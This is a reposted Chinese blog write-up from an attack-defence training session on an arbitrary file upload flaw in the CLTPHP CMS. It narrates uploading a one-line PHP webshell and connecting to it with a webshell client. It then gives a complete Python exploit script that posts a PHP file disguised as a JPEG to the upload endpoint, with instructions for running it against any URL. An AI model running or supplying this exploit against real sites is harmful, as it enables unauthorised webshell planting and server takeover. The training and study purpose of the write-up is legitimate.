CLTPHP 漏洞


前言

awd小組的第一次訓練

0x01

首先看一下主界面

使用的應該是PHP模板,隨便翻一下找到一個注冊界面

隨便注冊一個用戶,登陸后在設置里找到一個上傳點

上傳我們的一句話木馬

查看返回包,上傳成功

訪問失敗,猜測返回路徑可能不是絕對路徑

通過報錯信息查找關鍵詞,發現存在public目錄 那再把public加上再試試~ success!

菜刀連接

0x02

換個思路,網站應該是開源的,百度搜一下關鍵詞,找到一個 payload

#!/usr/bin/python
#-*- coding: UTF-8 -*-
#Author:Bypass
#Date:2018.03.01
import requests
import sys

def CLPHP_upload(url):
        header = { 'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)' ,
                                'X-Requested-With': 'XMLHttpRequest',} 
        geturl = url+"/user/upFiles/upload"
        files ={'file':('1.php',open('1.php','rb'),'image/jpeg')}
        res = requests.post(geturl, files=files,headers=header)
        print res.text

if __name__ == "__main__":
        if len(sys.argv) == 2:
                url=sys.argv[1]
                CLPHP_upload(url)
                sys.exit(0)
        else:
                print ("usage: %s xxx.com " % sys.argv[0])
                sys.exit(-1)

使用方法:把payload.py和一句話.php放到同一文件夾下,

cmd執行 python payload.py url


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM